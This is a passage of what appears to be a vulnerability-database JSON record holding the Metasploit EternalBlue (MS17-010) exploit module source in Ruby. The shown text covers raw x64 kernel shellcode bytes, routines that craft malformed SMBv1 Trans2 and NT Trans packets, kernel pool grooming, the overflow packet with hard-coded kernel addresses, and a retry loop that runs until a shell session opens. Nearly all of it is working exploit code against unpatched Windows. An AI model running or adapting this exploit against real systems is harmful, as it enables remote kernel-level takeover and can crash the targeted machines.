\"\\x48\\x8B\\x24\\x25\\x10\\x00\\x00\\x00\\x0F\\x01\\xF8\\xFF\\x24\\x25\\xF8\\x0F\" +\n \"\\xD0\\xFF\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\\x55\\x48\\x89\\xE5\" +\n \"\\x66\\x83\\xE4\\xF0\\x48\\x83\\xEC\\x20\\x4C\\x8D\\x35\\xE3\\xFF\\xFF\\xFF\\x65\" +\n \"\\x4C\\x8B\\x3C\\x25\\x38\\x00\\x00\\x00\\x4D\\x8B\\x7F\\x04\\x49\\xC1\\xEF\\x0C\" +\n \"\\x49\\xC1\\xE7\\x0C\\x49\\x81\\xEF\\x00\\x10\\x00\\x00\\x49\\x8B\\x37\\x66\\x81\" +\n \"\\xFE\\x4D\\x5A\\x75\\xEF\\x41\\xBB\\x5C\\x72\\x11\\x62\\xE8\\x18\\x02\\x00\\x00\" +\n \"\\x48\\x89\\xC6\\x48\\x81\\xC6\\x08\\x03\\x00\\x00\\x41\\xBB\\x7A\\xBA\\xA3\\x30\" +\n \"\\xE8\\x03\\x02\\x00\\x00\\x48\\x89\\xF1\\x48\\x39\\xF0\\x77\\x11\\x48\\x8D\\x90\" +\n \"\\x00\\x05\\x00\\x00\\x48\\x39\\xF2\\x72\\x05\\x48\\x29\\xC6\\xEB\\x08\\x48\\x8B\" +\n \"\\x36\\x48\\x39\\xCE\\x75\\xE2\\x49\\x89\\xF4\\x31\\xDB\\x89\\xD9\\x83\\xC1\\x04\" +\n \"\\x81\\xF9\\x00\\x00\\x01\\x00\\x0F\\x8D\\x66\\x01\\x00\\x00\\x4C\\x89\\xF2\\x89\" +\n \"\\xCB\\x41\\xBB\\x66\\x55\\xA2\\x4B\\xE8\\xBC\\x01\\x00\\x00\\x85\\xC0\\x75\\xDB\" +\n \"\\x49\\x8B\\x0E\\x41\\xBB\\xA3\\x6F\\x72\\x2D\\xE8\\xAA\\x01\\x00\\x00\\x48\\x89\" +\n \"\\xC6\\xE8\\x50\\x01\\x00\\x00\\x41\\x81\\xF9\\xBF\\x77\\x1F\\xDD\\x75\\xBC\\x49\" +\n \"\\x8B\\x1E\\x4D\\x8D\\x6E\\x10\\x4C\\x89\\xEA\\x48\\x89\\xD9\\x41\\xBB\\xE5\\x24\" +\n \"\\x11\\xDC\\xE8\\x81\\x01\\x00\\x00\\x6A\\x40\\x68\\x00\\x10\\x00\\x00\\x4D\\x8D\" +\n \"\\x4E\\x08\\x49\\xC7\\x01\\x00\\x10\\x00\\x00\\x4D\\x31\\xC0\\x4C\\x89\\xF2\\x31\" +\n \"\\xC9\\x48\\x89\\x0A\\x48\\xF7\\xD1\\x41\\xBB\\x4B\\xCA\\x0A\\xEE\\x48\\x83\\xEC\" +\n \"\\x20\\xE8\\x52\\x01\\x00\\x00\\x85\\xC0\\x0F\\x85\\xC8\\x00\\x00\\x00\\x49\\x8B\" +\n \"\\x3E\\x48\\x8D\\x35\\xE9\\x00\\x00\\x00\\x31\\xC9\\x66\\x03\\x0D\\xD7\\x01\\x00\" +\n \"\\x00\\x66\\x81\\xC1\\xF9\\x00\\xF3\\xA4\\x48\\x89\\xDE\\x48\\x81\\xC6\\x08\\x03\" +\n \"\\x00\\x00\\x48\\x89\\xF1\\x48\\x8B\\x11\\x4C\\x29\\xE2\\x51\\x52\\x48\\x89\\xD1\" +\n \"\\x48\\x83\\xEC\\x20\\x41\\xBB\\x26\\x40\\x36\\x9D\\xE8\\x09\\x01\\x00\\x00\\x48\" +\n \"\\x83\\xC4\\x20\\x5A\\x59\\x48\\x85\\xC0\\x74\\x18\\x48\\x8B\\x80\\xC8\\x02\\x00\" +\n \"\\x00\\x48\\x85\\xC0\\x74\\x0C\\x48\\x83\\xC2\\x4C\\x8B\\x02\\x0F\\xBA\\xE0\\x05\" +\n \"\\x72\\x05\\x48\\x8B\\x09\\xEB\\xBE\\x48\\x83\\xEA\\x4C\\x49\\x89\\xD4\\x31\\xD2\" +\n \"\\x80\\xC2\\x90\\x31\\xC9\\x41\\xBB\\x26\\xAC\\x50\\x91\\xE8\\xC8\\x00\\x00\\x00\" +\n \"\\x48\\x89\\xC1\\x4C\\x8D\\x89\\x80\\x00\\x00\\x00\\x41\\xC6\\x01\\xC3\\x4C\\x89\" +\n \"\\xE2\\x49\\x89\\xC4\\x4D\\x31\\xC0\\x41\\x50\\x6A\\x01\\x49\\x8B\\x06\\x50\\x41\" +\n \"\\x50\\x48\\x83\\xEC\\x20\\x41\\xBB\\xAC\\xCE\\x55\\x4B\\xE8\\x98\\x00\\x00\\x00\" +\n \"\\x31\\xD2\\x52\\x52\\x41\\x58\\x41\\x59\\x4C\\x89\\xE1\\x41\\xBB\\x18\\x38\\x09\" +\n \"\\x9E\\xE8\\x82\\x00\\x00\\x00\\x4C\\x89\\xE9\\x41\\xBB\\x22\\xB7\\xB3\\x7D\\xE8\" +\n \"\\x74\\x00\\x00\\x00\\x48\\x89\\xD9\\x41\\xBB\\x0D\\xE2\\x4D\\x85\\xE8\\x66\\x00\" +\n \"\\x00\\x00\\x48\\x89\\xEC\\x5D\\x5B\\x41\\x5C\\x41\\x5D\\x41\\x5E\\x41\\x5F\\x5E\" +\n \"\\xC3\\xE9\\xB5\\x00\\x00\\x00\\x4D\\x31\\xC9\\x31\\xC0\\xAC\\x41\\xC1\\xC9\\x0D\" +\n \"\\x3C\\x61\\x7C\\x02\\x2C\\x20\\x41\\x01\\xC1\\x38\\xE0\\x75\\xEC\\xC3\\x31\\xD2\" +\n \"\\x65\\x48\\x8B\\x52\\x60\\x48\\x8B\\x52\\x18\\x48\\x8B\\x52\\x20\\x48\\x8B\\x12\" +\n \"\\x48\\x8B\\x72\\x50\\x48\\x0F\\xB7\\x4A\\x4A\\x45\\x31\\xC9\\x31\\xC0\\xAC\\x3C\" +\n \"\\x61\\x7C\\x02\\x2C\\x20\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\\xE2\\xEE\\x45\\x39\" +\n \"\\xD9\\x75\\xDA\\x4C\\x8B\\x7A\\x20\\xC3\\x4C\\x89\\xF8\\x41\\x51\\x41\\x50\\x52\" +\n \"\\x51\\x56\\x48\\x89\\xC2\\x8B\\x42\\x3C\\x48\\x01\\xD0\\x8B\\x80\\x88\\x00\\x00\" +\n \"\\x00\\x48\\x01\\xD0\\x50\\x8B\\x48\\x18\\x44\\x8B\\x40\\x20\\x49\\x01\\xD0\\x48\" +\n \"\\xFF\\xC9\\x41\\x8B\\x34\\x88\\x48\\x01\\xD6\\xE8\\x78\\xFF\\xFF\\xFF\\x45\\x39\" +\n \"\\xD9\\x75\\xEC\\x58\\x44\\x8B\\x40\\x24\\x49\\x01\\xD0\\x66\\x41\\x8B\\x0C\\x48\" +\n \"\\x44\\x8B\\x40\\x1C\\x49\\x01\\xD0\\x41\\x8B\\x04\\x88\\x48\\x01\\xD0\\x5E\\x59\" +\n \"\\x5A\\x41\\x58\\x41\\x59\\x41\\x5B\\x41\\x53\\xFF\\xE0\\x56\\x41\\x57\\x55\\x48\" +\n \"\\x89\\xE5\\x48\\x83\\xEC\\x20\\x41\\xBB\\xDA\\x16\\xAF\\x92\\xE8\\x4D\\xFF\\xFF\" +\n \"\\xFF\\x31\\xC9\\x51\\x51\\x51\\x51\\x41\\x59\\x4C\\x8D\\x05\\x1A\\x00\\x00\\x00\" +\n \"\\x5A\\x48\\x83\\xEC\\x20\\x41\\xBB\\x46\\x45\\x1B\\x22\\xE8\\x68\\xFF\\xFF\\xFF\" +\n \"\\x48\\x89\\xEC\\x5D\\x41\\x5F\\x5E\\xC3\"#\\x01\\x00\\xC3\"\n\n end\n\n # Sets common SMB1 Header values used by the various\n # packets in the exploit.\n #\n # @return [RubySMB::GenericPacket] the modified version of the packet\n def set_smb1_headers(packet,tree_id,user_id)\n packet.smb_header.flags2.read(\"\\x07\\xc0\")\n packet.smb_header.tid = tree_id\n packet.smb_header.uid = user_id\n packet.smb_header.pid_low = 65279\n packet.smb_header.mid = 64\n packet\n end\n\n\n # Returns the value to be passed to SMB clients for\n # the password. If the user has not supplied a password\n # it returns an empty string to trigger an anonymous\n # logon.\n #\n # @return [String] the password value\n def smb_pass\n if datastore['SMBPass'].present?\n datastore['SMBPass']\n else\n ''\n end\n end\n\n # Returns the value to be passed to SMB clients for\n # the username. If the user has not supplied a username\n # it returns an empty string to trigger an anonymous\n # logon.\n #\n # @return [String] the username value\n def smb_user\n if datastore['SMBUser'].present?\n datastore['SMBUser']\n else\n ''\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb", "title": "MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption", "type": "metasploit", "viewCount": 1920}, "differentElements": ["published", "modified", "sourceData"], "edition": 43, "lastseen": "2018-06-04T19:48:49"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "This module is a port of the Equation Group ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers. There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete. This exploit, like the original may not trigger 100% of the time, and should be run continuously until triggered. It seems like the pool will get hot streaks and need a cool down period before the shells rain in again. The module will attempt to use Anonymous login, by default, to authenticate to perform the exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use those instead. On some systems, this module may cause system instability and crashes, such as a BSOD or a reboot. This may be more likely with some payloads.", "enchantments": {"score": {"modified": "2018-04-14T18:18:58", "value": 5.8, "vector": "AV:L/AC:M/Au:M/C:C/I:N/A:C/"}}, "hash": "", "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "lastseen": "2018-04-14T18:18:58", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb", "metasploitReliability": "Average", "modified": "1976-01-01T00:00:00", "objectVersion": "1.4", "published": "1976-01-01T00:00:00", "references": [], "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'ruby_smb'\nrequire 'ruby_smb/smb1/packet'\nrequire 'windows_error'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::DCERPC\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption',\n 'Description' => %q{\n This module is a port of the Equation Group ETERNALBLUE exploit, part of\n the FuzzBunch toolkit released by Shadow Brokers.\n\n There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size\n is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a\n DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow\n is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later\n completed in srvnet!SrvNetWskReceiveComplete.\n\n This exploit, like the original may not trigger 100% of the time, and should be\n run continuously until triggered. It seems like the pool will get hot streaks\n and need a cool down period before the shells rain in again.\n\n The module will attempt to use Anonymous login, by default, to authenticate to perform the\n exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use\n those instead.\n\n On some systems, this module may cause system instability and crashes, such as a BSOD or\n a reboot. This may be more likely with some payloads.\n },\n\n 'Author' => [\n 'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0\n 'Dylan Davis <dylan.davis@risksense.com>', # @jennamagius\n 'Equation Group',\n 'Shadow Brokers',\n 'thelightcosine' # RubySMB refactor and Fallback Credential mode\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'AKA', 'ETERNALBLUE' ],\n [ 'MSB', 'MS17-010' ],\n [ 'CVE', '2017-0143' ],\n [ 'CVE', '2017-0144' ],\n [ 'CVE', '2017-0145' ],\n [ 'CVE', '2017-0146' ],\n [ 'CVE', '2017-0147' ],\n [ 'CVE', '2017-0148' ],\n [ 'URL', 'https://github.com/RiskSense-Ops/MS17-010' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n 'WfsDelay' => 5,\n },\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 2000, # this can be more, needs to be recalculated\n 'EncoderType' => Msf::Encoder::Type::Raw,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows 7 and Server 2008 R2 (x64) All Service Packs',\n {\n 'Platform' => 'win',\n 'Arch' => [ ARCH_X64 ],\n\n 'os_patterns' => ['Server 2008 R2', 'Windows 7'],\n 'ep_thl_b' => 0x308, # EPROCESS.ThreadListHead.Blink offset\n 'et_alertable' => 0x4c, # ETHREAD.Alertable offset\n 'teb_acp' => 0x2c8, # TEB.ActivationContextPointer offset\n 'et_tle' => 0x420 # ETHREAD.ThreadListEntry offset\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Mar 14 2017'\n ))\n\n register_options(\n [\n Opt::RPORT(445),\n OptString.new('ProcessName', [ true, 'Process to inject payload into.', 'spoolsv.exe' ]),\n OptInt.new( 'MaxExploitAttempts', [ true, \"The number of times to retry the exploit.\", 3 ] ),\n OptInt.new( 'GroomAllocations', [ true, \"Initial number of times to groom the kernel pool.\", 12 ] ),\n OptInt.new( 'GroomDelta', [ true, \"The amount to increase the groom count by per try.\", 5 ] ),\n OptBool.new( 'VerifyTarget', [ true, \"Check if remote OS matches exploit Target.\", true ] ),\n OptBool.new( 'VerifyArch', [ true, \"Check if remote architecture matches exploit Target.\", true ] ),\n OptString.new('SMBUser', [ false, '(Optional) The username to authenticate as', '']),\n OptString.new('SMBPass', [ false, '(Optional) The password for the specified username', '']),\n OptString.new('SMBDomain', [ false, '(Optional) The Windows domain to use for authentication', '.']),\n ])\n end\n\n class EternalBlueError < StandardError\n end\n\n def check\n # todo: create MS17-010 mixin, and hook up auxiliary/scanner/smb/smb_ms17_010\n end\n\n def exploit\n begin\n for i in 1..datastore['MaxExploitAttempts']\n\n grooms = datastore['GroomAllocations'] + datastore['GroomDelta'] * (i - 1)\n\n smb_eternalblue(datastore['ProcessName'], grooms)\n\n # we don't need this sleep, and need to find a way to remove it\n # problem is session_count won't increment until stage is complete :\\\n secs = 0\n while !session_created? and secs < 30\n secs += 1\n sleep 1\n end\n\n if session_created?\n print_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n print_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n print_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n break\n else\n print_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n print_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n print_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n end\n end\n\n rescue EternalBlueError => e\n print_error(\"#{e.message}\")\n return false\n rescue ::RubySMB::Error::NegotiationFailure\n print_error(\"SMB Negotiation Failure -- this often occurs when lsass crashes. The target may reboot in 60 seconds.\")\n return false\n rescue ::RubySMB::Error::UnexpectedStatusCode,\n ::Errno::ECONNRESET,\n ::Rex::HostUnreachable,\n ::Rex::ConnectionTimeout,\n ::Rex::ConnectionRefused,\n ::RubySMB::Error::CommunicationError => e\n print_error(\"#{e.class}: #{e.message}\")\n report_failure\n return false\n rescue => error\n print_error(error.class.to_s)\n print_error(error.message)\n print_error(error.backtrace.join(\"\\n\"))\n return false\n ensure\n # pass\n end\n end\n\n def smb_eternalblue(process_name, grooms)\n begin\n # Step 0: pre-calculate what we can\n shellcode = make_kernel_user_payload(payload.encode, 0, 0, 0, 0, 0)\n payload_hdr_pkt = make_smb2_payload_headers_packet\n payload_body_pkt = make_smb2_payload_body_packet(shellcode)\n\n # Step 1: Connect to IPC$ share\n print_status(\"Connecting to target for exploitation.\")\n client, tree, sock, os = smb1_anonymous_connect_ipc()\n rescue RubySMB::Error::CommunicationError\n # Error handler in case SMBv1 disabled on target\n raise EternalBlueError, 'Could not make SMBv1 connection'\n else\n print_good(\"Connection established for exploitation.\")\n\n if verify_target(os)\n print_good('Target OS selected valid for OS indicated by SMB reply')\n else\n print_warning('Target OS selected not valid for OS indicated by SMB reply')\n print_warning('Disable VerifyTarget option to proceed manually...')\n raise EternalBlueError, 'Unable to continue with improper OS Target.'\n end\n\n # cool buffer print no matter what, will be helpful when people post debug issues\n print_core_buffer(os)\n\n if verify_arch\n print_good('Target arch selected valid for arch indicated by DCE/RPC reply')\n else\n print_warning('Target arch selected not valid for arch indicated by DCE/RPC reply')\n print_warning('Disable VerifyArch option to proceed manually...')\n raise EternalBlueError, 'Unable to continue with improper OS Arch.'\n end\n\n print_status(\"Trying exploit with #{grooms} Groom Allocations.\")\n\n # Step 2: Create a large SMB1 buffer\n print_status(\"Sending all but last fragment of exploit packet\")\n smb1_large_buffer(client, tree, sock)\n\n # Step 3: Groom the pool with payload packets, and open/close SMB1 packets\n print_status(\"Starting non-paged pool grooming\")\n\n # initialize_groom_threads(ip, port, payload, grooms)\n fhs_sock = smb1_free_hole(true)\n\n @groom_socks = []\n\n print_good(\"Sending SMBv2 buffers\")\n smb2_grooms(grooms, payload_hdr_pkt)\n\n fhf_sock = smb1_free_hole(false)\n\n print_good(\"Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.\")\n fhs_sock.shutdown()\n\n print_status(\"Sending final SMBv2 buffers.\") # 6x\n smb2_grooms(6, payload_hdr_pkt) # todo: magic #\n\n fhf_sock.shutdown()\n\n print_status(\"Sending last fragment of exploit packet!\")\n final_exploit_pkt = make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_exploit, 15)\n sock.put(final_exploit_pkt)\n\n print_status(\"Receiving response from exploit packet\")\n code, raw = smb1_get_response(sock)\n\n code_str = \"0x\" + code.to_i.to_s(16).upcase\n if code.nil?\n print_error(\"Did not receive a response from exploit packet\")\n elsif code == 0xc000000d # STATUS_INVALID_PARAMETER (0xC000000D)\n print_good(\"ETERNALBLUE overwrite completed successfully (#{code_str})!\")\n else\n print_warning(\"ETERNALBLUE overwrite returned unexpected status code (#{code_str})!\")\n end\n\n # Step 4: Send the payload\n print_status(\"Sending egg to corrupted connection.\")\n\n @groom_socks.each{ |gsock| gsock.put(payload_body_pkt.first(2920)) }\n @groom_socks.each{ |gsock| gsock.put(payload_body_pkt[2920..(4204 - 0x84)]) }\n\n print_status(\"Triggering free of corrupted buffer.\")\n # tree disconnect\n # logoff and x\n # note: these aren't necessary, just close the sockets\n return true\n ensure\n abort_sockets\n end\n end\n\n def verify_target(os)\n os = os.gsub(\"\\x00\", '') # strip unicode bs\n os << \"\\x00\" # but original has a null\n ret = true\n\n if datastore['VerifyTarget']\n ret = false\n # search if its in patterns\n target['os_patterns'].each do |pattern|\n if os.downcase.include? pattern.downcase\n ret = true\n break\n end\n end\n end\n\n return ret\n end\n\n def verify_arch\n return true unless datastore['VerifyArch']\n (dcerpc_getarch == target_arch.first) ? true : false\n end\n\n def print_core_buffer(os)\n print_status(\"CORE raw buffer dump (#{os.length.to_s} bytes)\")\n\n count = 0\n chunks = os.scan(/.{1,16}/)\n chunks.each do | chunk |\n hexdump = chunk.chars.map { |ch| ch.ord.to_s(16).rjust(2, \"0\") }.join(\" \")\n\n format = \"0x%08x %-47s %-16s\" % [(count * 16), hexdump, chunk]\n print_status(format)\n count += 1\n end\n end\n\n '''\n #\n # Increase the default delay by five seconds since some kernel-mode\n # payloads may not run immediately.\n #\n def wfs_delay\n super + 5\n end\n '''\n\n def smb2_grooms(grooms, payload_hdr_pkt)\n grooms.times do |groom_id|\n gsock = connect(false)\n @groom_socks << gsock\n gsock.put(payload_hdr_pkt)\n end\n end\n\n def smb1_anonymous_connect_ipc\n sock = connect(false)\n dispatcher = RubySMB::Dispatcher::Socket.new(sock)\n client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: smb_user, password: smb_pass)\n response_code = client.login\n\n unless response_code == ::WindowsError::NTStatus::STATUS_SUCCESS\n raise RubySMB::Error::UnexpectedStatusCode, \"Error with login: #{response_code.to_s}\"\n end\n os = client.peer_native_os\n\n tree = client.tree_connect(\"\\\\\\\\#{datastore['RHOST']}\\\\IPC$\")\n\n return client, tree, sock, os\n end\n\n def smb1_large_buffer(client, tree, sock)\n nt_trans_pkt = make_smb1_nt_trans_packet(tree.id, client.user_id)\n\n # send NT Trans\n vprint_status(\"Sending NT Trans Request packet\")\n\n client.send_recv(nt_trans_pkt)\n # Initial Trans2 request\n trans2_pkt_nulled = make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_zero, 0)\n\n # send all but last packet\n for i in 1..14\n trans2_pkt_nulled << make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_buffer, i)\n end\n\n vprint_status(\"Sending malformed Trans2 packets\")\n sock.put(trans2_pkt_nulled)\n\n begin\n sock.get_once\n rescue EOFError\n vprint_error(\"No response back from SMB echo request. Continuing anyway...\")\n end\n\n client.echo(count:1, data: \"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x00\")\n end\n\n def smb1_free_hole(start)\n sock = connect(false)\n dispatcher = RubySMB::Dispatcher::Socket.new(sock)\n client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: smb_user, password: smb_pass)\n client.negotiate\n\n pkt = \"\"\n\n if start\n vprint_status(\"Sending start free hole packet.\")\n pkt = make_smb1_free_hole_session_packet(\"\\x07\\xc0\", \"\\x2d\\x01\", \"\\xf0\\xff\\x00\\x00\\x00\")\n else\n vprint_status(\"Sending end free hole packet.\")\n pkt = make_smb1_free_hole_session_packet(\"\\x07\\x40\", \"\\x2c\\x01\", \"\\xf8\\x87\\x00\\x00\\x00\")\n end\n\n client.send_recv(pkt)\n sock\n end\n\n def smb1_get_response(sock)\n raw = nil\n\n # dirty hack since it doesn't always like to reply the first time...\n 16.times do\n raw = sock.get_once\n break unless raw.nil? or raw.empty?\n end\n\n return nil unless raw\n response = RubySMB::SMB1::SMBHeader.read(raw[4..-1])\n code = response.nt_status\n return code, raw, response\n end\n\n def make_smb2_payload_headers_packet\n # don't need a library here, the packet is essentially nonsensical\n pkt = \"\"\n pkt << \"\\x00\" # session message\n pkt << \"\\x00\\xff\\xf7\" # size\n pkt << \"\\xfeSMB\" # SMB2\n pkt << \"\\x00\" * 124\n\n pkt\n end\n\n def make_smb2_payload_body_packet(kernel_user_payload)\n # precalculated lengths\n pkt_max_len = 4204\n pkt_setup_len = 497\n pkt_max_payload = pkt_max_len - pkt_setup_len # 3575\n\n # this packet holds padding, KI_USER_SHARED_DATA addresses, and shellcode\n pkt = \"\"\n\n # padding\n pkt << \"\\x00\" * 0x8\n pkt << \"\\x03\\x00\\x00\\x00\"\n pkt << \"\\x00\" * 0x1c\n pkt << \"\\x03\\x00\\x00\\x00\"\n pkt << \"\\x00\" * 0x74\n\n # KI_USER_SHARED_DATA addresses\n pkt << \"\\xb0\\x00\\xd0\\xff\\xff\\xff\\xff\\xff\" * 2 # x64 address\n pkt << \"\\x00\" * 0x10\n pkt << \"\\xc0\\xf0\\xdf\\xff\" * 2 # x86 address\n pkt << \"\\x00\" * 0xc4\n\n # payload addreses\n pkt << \"\\x90\\xf1\\xdf\\xff\"\n pkt << \"\\x00\" * 0x4\n pkt << \"\\xf0\\xf1\\xdf\\xff\"\n pkt << \"\\x00\" * 0x40\n\n pkt << \"\\xf0\\x01\\xd0\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x00\" * 0x8\n pkt << \"\\x00\\x02\\xd0\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x00\"\n\n pkt << kernel_user_payload\n\n # fill out the rest, this can be randomly generated\n pkt << \"\\x00\" * (pkt_max_payload - kernel_user_payload.length)\n\n pkt\n end\n\n # Type can be :eb_trans2_zero, :eb_trans2_buffer, or :eb_trans2_exploit\n def make_smb1_trans2_exploit_packet(tree_id, user_id, type, timeout)\n timeout = (timeout * 0x10) + 3\n timeout_value = \"\\x35\\x00\\xd0\" + timeout.chr\n\n packet = RubySMB::SMB1::Packet::Trans2::Request.new\n packet = set_smb1_headers(packet,tree_id,user_id)\n\n # The packets are labeled as Secondary Requests but are actually structured\n # as normal Trans2 Requests for some reason. We shall similarly cheat here.\n packet.smb_header.command = RubySMB::SMB1::Commands::SMB_COM_TRANSACTION2_SECONDARY\n\n packet.parameter_block.flags.read(\"\\x00\\x10\")\n packet.parameter_block.timeout.read(timeout_value)\n\n packet.parameter_block.word_count = 9\n packet.parameter_block.total_data_count = 4096\n packet.parameter_block.parameter_count = 4096\n\n nbss = \"\\x00\\x00\\x10\\x35\"\n pkt = packet.to_binary_s\n pkt = pkt[0,packet.parameter_block.parameter_offset.abs_offset]\n pkt = nbss + pkt\n\n case type\n when :eb_trans2_exploit\n vprint_status(\"Making :eb_trans2_exploit packet\")\n\n pkt << \"\\x41\" * 2957\n\n pkt << \"\\x80\\x00\\xa8\\x00\" # overflow\n\n pkt << \"\\x00\" * 0x10\n pkt << \"\\xff\\xff\"\n pkt << \"\\x00\" * 0x6\n pkt << \"\\xff\\xff\"\n pkt << \"\\x00\" * 0x16\n\n pkt << \"\\x00\\xf1\\xdf\\xff\" # x86 addresses\n pkt << \"\\x00\" * 0x8\n pkt << \"\\x20\\xf0\\xdf\\xff\"\n\n pkt << \"\\x00\\xf1\\xdf\\xff\\xff\\xff\\xff\\xff\" # x64\n\n pkt << \"\\x60\\x00\\x04\\x10\"\n pkt << \"\\x00\" * 4\n\n pkt << \"\\x80\\xef\\xdf\\xff\"\n\n pkt << \"\\x00\" * 4\n pkt << \"\\x10\\x00\\xd0\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x18\\x01\\xd0\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x00\" * 0x10\n\n pkt << \"\\x60\\x00\\x04\\x10\"\n pkt << \"\\x00\" * 0xc\n pkt << \"\\x90\\xff\\xcf\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x00\" * 0x8\n pkt << \"\\x80\\x10\"\n pkt << \"\\x00\" * 0xe\n pkt << \"\\x39\"\n pkt << \"\\xbb\"\n\n pkt << \"\\x41\" * 965\n when :eb_trans2_zero\n vprint_status(\"Making :eb_trans2_zero packet\")\n pkt << \"\\x00\" * 2055\n pkt << \"\\x83\\xf3\"\n pkt << \"\\x41\" * 2039\n else\n vprint_status(\"Making :eb_trans2_buffer packet\")\n pkt << \"\\x41\" * 4096\n end\n pkt\n end\n\n def make_smb1_nt_trans_packet(tree_id, user_id)\n packet = RubySMB::SMB1::Packet::NtTrans::Request.new\n\n # Disable the automatic padding because it will distort\n # our values here.\n packet.data_block.enable_padding = false\n\n packet = set_smb1_headers(packet,tree_id,user_id)\n\n packet.parameter_block.max_setup_count = 1\n packet.parameter_block.total_parameter_count = 30\n packet.parameter_block.total_data_count = 66512\n packet.parameter_block.max_parameter_count = 30\n packet.parameter_block.max_data_count = 0\n packet.parameter_block.parameter_count = 30\n packet.parameter_block.parameter_offset = 75\n packet.parameter_block.data_count = 976\n packet.parameter_block.data_offset = 104\n packet.parameter_block.function = 0\n\n packet.parameter_block.setup << 0x0000\n\n packet.data_block.byte_count = 1004\n packet.data_block.trans2_parameters = \"\\x00\" * 31 + \"\\x01\" + ( \"\\x00\" * 973 )\n packet\n end\n\n def make_smb1_free_hole_session_packet(flags2, vcnum, native_os)\n packet = RubySMB::SMB1::Packet::SessionSetupRequest.new\n\n packet.smb_header.flags.read(\"\\x18\")\n packet.smb_header.flags2.read(flags2)\n packet.smb_header.pid_high = 65279\n packet.smb_header.mid = 64\n\n packet.parameter_block.vc_number.read(vcnum)\n packet.parameter_block.max_buffer_size = 4356\n packet.parameter_block.max_mpx_count = 10\n packet.parameter_block.security_blob_length = 0\n\n packet.data_block.native_os = native_os\n packet.data_block.native_lan_man = \"\\x00\" * 17\n packet\n end\n\n # ring3 = user mode encoded payload\n # proc_name = process to inject APC into\n # ep_thl_b = EPROCESS.ThreadListHead.Blink offset\n # et_alertable = ETHREAD.Alertable offset\n # teb_acp = TEB.ActivationContextPointer offset\n # et_tle = ETHREAD.ThreadListEntry offset\n def make_kernel_user_payload(ring3, proc_name, ep_thl_b, et_alertable, teb_acp, et_tle)\n sc = make_kernel_shellcode\n sc << [ring3.length].pack(\"S<\")\n sc << ring3\n sc\n end\n\n def make_kernel_shellcode\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n # Length: 1019 bytes\n\n #\"\\xcc\"+\n \"\\x31\\xC9\\x41\\xE2\\x01\\xC3\\xB9\\x82\\x00\\x00\\xC0\\x0F\\x32\\x48\\xBB\\xF8\" +\n 